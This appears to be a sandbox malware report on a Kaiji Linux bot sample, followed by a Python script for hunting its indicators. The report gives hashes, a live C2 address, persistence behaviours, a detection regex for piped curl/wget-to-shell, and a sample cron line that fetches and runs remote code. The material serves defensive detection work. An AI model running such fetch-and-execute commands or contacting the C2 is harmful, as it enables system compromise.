General

  • Target

    1805a01f3d3ed529079daf427941f35ac1a808da1c70f416dc4bc0c2068c24a4.elf

  • Size

    5.0MB

  • Sample

    241111-ckwx5szfjn

  • MD5

    4147e50daff23cbea5cf1faabb73b576

  • SHA1

    438816933c155b9f3d7e3b5758715b0e32f4cff6

  • SHA256

    1805a01f3d3ed529079daf427941f35ac1a808da1c70f416dc4bc0c2068c24a4

  • SHA512

    92ec9f9f0230566511ee7ddaeb96c4423010299ac2f3318b49174a437c87a338fa354409ebc9b6fe242f0da0b112661a241260043c72c4f9ccf53e0832b4ce9e

  • SSDEEP

    49152:aIJ8Ou+wh2zUVtN9vEaBPC3uIdlLloDH8QEpOGr6KpZd1I1J:ayxyl/N9vROqci

Malware Config

Extracted

Family

kaiji

C2

38.55.251.57:8899

Targets

    • Target

      1805a01f3d3ed529079daf427941f35ac1a808da1c70f416dc4bc0c2068c24a4.elf

    • Size

      5.0MB

    • MD5

      4147e50daff23cbea5cf1faabb73b576

    • SHA1

      438816933c155b9f3d7e3b5758715b0e32f4cff6

    • SHA256

      1805a01f3d3ed529079daf427941f35ac1a808da1c70f416dc4bc0c2068c24a4

    • SHA512

      92ec9f9f0230566511ee7ddaeb96c4423010299ac2f3318b49174a437c87a338fa354409ebc9b6fe242f0da0b112661a241260043c72c4f9ccf53e0832b4ce9e

    • SSDEEP

      49152:aIJ8Ou+wh2zUVtN9vEaBPC3uIdlLloDH8QEpOGr6KpZd1I1J:ayxyl/N9vROqci

    • Kaiji

      Kaiji payload

    • Kaiji family

    • Renames multiple (1040) files with an added filename extension

      This is the sandbox's heuristic for ransomware-style activity (mass encryption and renaming of files on the system). Kaiji is otherwise documented as a Go-written Linux DDoS bot, so treat this signature as a lead to confirm against the renamed files rather than as proof that the sample encrypts them.

    • Executes dropped EXE

    • Loads a kernel module

      Loads a Linux kernel module, potentially to achieve persistence

    • Abuse Elevation Control Mechanism: Sudo and Sudo Caching

      Abuse sudo or cached sudo credentials to execute code.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.
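The report gives a C2 endpoint (38.55.251.57:8899), file hashes, and cron-based persistence as indicators. The script below is an added example of how to hunt for those indicators on a Linux host; it is not part of the sandbox report and not Kaiji's own code. It decodes /proc/net/tcp to find sockets talking to the C2, flags cron entries that match a few persistence heuristics (staging directories such as /tmp, remote fetch piped into a shell, or the C2 address itself), and compares a file's digests with the report's hashes. The /proc/net/tcp and crontab samples are constructed for the demonstration, and the heuristic patterns are assumptions to be tuned per fleet.

```python
import hashlib
import ipaddress
import re
import struct

# Indicators taken from the report above.
IOC_SHA256 = "1805a01f3d3ed529079daf427941f35ac1a808da1c70f416dc4bc0c2068c24a4"
IOC_MD5 = "4147e50daff23cbea5cf1faabb73b576"
C2_IP = "38.55.251.57"
C2_PORT = 8899


def hash_matches(data: bytes) -> dict:
    """Compare a candidate file's bytes against the report's MD5 and SHA256."""
    return {
        "md5": hashlib.md5(data).hexdigest() == IOC_MD5,
        "sha256": hashlib.sha256(data).hexdigest() == IOC_SHA256,
    }


def _decode_addr(hex_addr: str) -> tuple:
    """Decode a /proc/net/tcp 'AABBCCDD:PPPP' field.

    The kernel prints the IPv4 address as a native-endian 32-bit word, so on
    x86 the bytes appear reversed (127.0.0.1 shows up as 0100007F).
    """
    ip_hex, port_hex = hex_addr.split(":")
    ip = ipaddress.IPv4Address(struct.pack("<I", int(ip_hex, 16)))
    return str(ip), int(port_hex, 16)


TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "0A": "LISTEN"}


def find_c2_connections(proc_net_tcp: str) -> list:
    """Return sockets whose remote end is the report's C2 address."""
    hits = []
    for line in proc_net_tcp.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 4:
            continue
        local_ip, local_port = _decode_addr(fields[1])
        remote_ip, remote_port = _decode_addr(fields[2])
        if remote_ip == C2_IP and remote_port == C2_PORT:
            hits.append({
                "local": f"{local_ip}:{local_port}",
                "remote": f"{remote_ip}:{remote_port}",
                "state": TCP_STATES.get(fields[3], fields[3]),
            })
    return hits


# Assumed heuristics for cron persistence: world-writable staging directories,
# a remote fetch piped straight into a shell, or the C2 address itself.
CRON_SUSPICIOUS = re.compile(
    r"(/tmp/|/dev/shm/|/var/tmp/|(curl|wget)[^|]*\|\s*(ba)?sh|"
    + re.escape(C2_IP) + r")"
)


def suspicious_cron_entries(crontab: str) -> list:
    """Return non-comment cron lines that match the heuristic patterns."""
    hits = []
    for line in crontab.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if CRON_SUSPICIOUS.search(stripped):
            hits.append(stripped)
    return hits


# Constructed sample data (not captured from a real host). Entry 1 is an
# ESTABLISHED socket from 10.0.2.15:41970 to the C2; the others are benign.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:A3F2 39FB3726:22C3 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 20 4 30 10 -1
   2: 0F02000A:B1C4 5DB8D822:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 12347 1 0000000000000000 20 4 30 10 -1
"""

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/1 * * * * /tmp/.x/svc >/dev/null 2>&1
@reboot curl -s http://example.invalid/x | sh
"""

if __name__ == "__main__":
    # On a live host read open('/proc/net/tcp').read() and the output of
    # 'crontab -l' / the files under /etc/cron.d instead of the samples.
    print(find_c2_connections(SAMPLE_PROC_NET_TCP))
    print(suspicious_cron_entries(SAMPLE_CRONTAB))
```

On a real host, feed the script /proc/net/tcp (and /proc/net/tcp6 if the C2 were reachable over IPv6), the root and per-user crontabs, and the contents of /etc/cron.d; a hit on the C2 address is high-confidence, while the cron heuristics are only a triage filter and will flag legitimate jobs that use /tmp.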

MITRE ATT&CK Enterprise v15
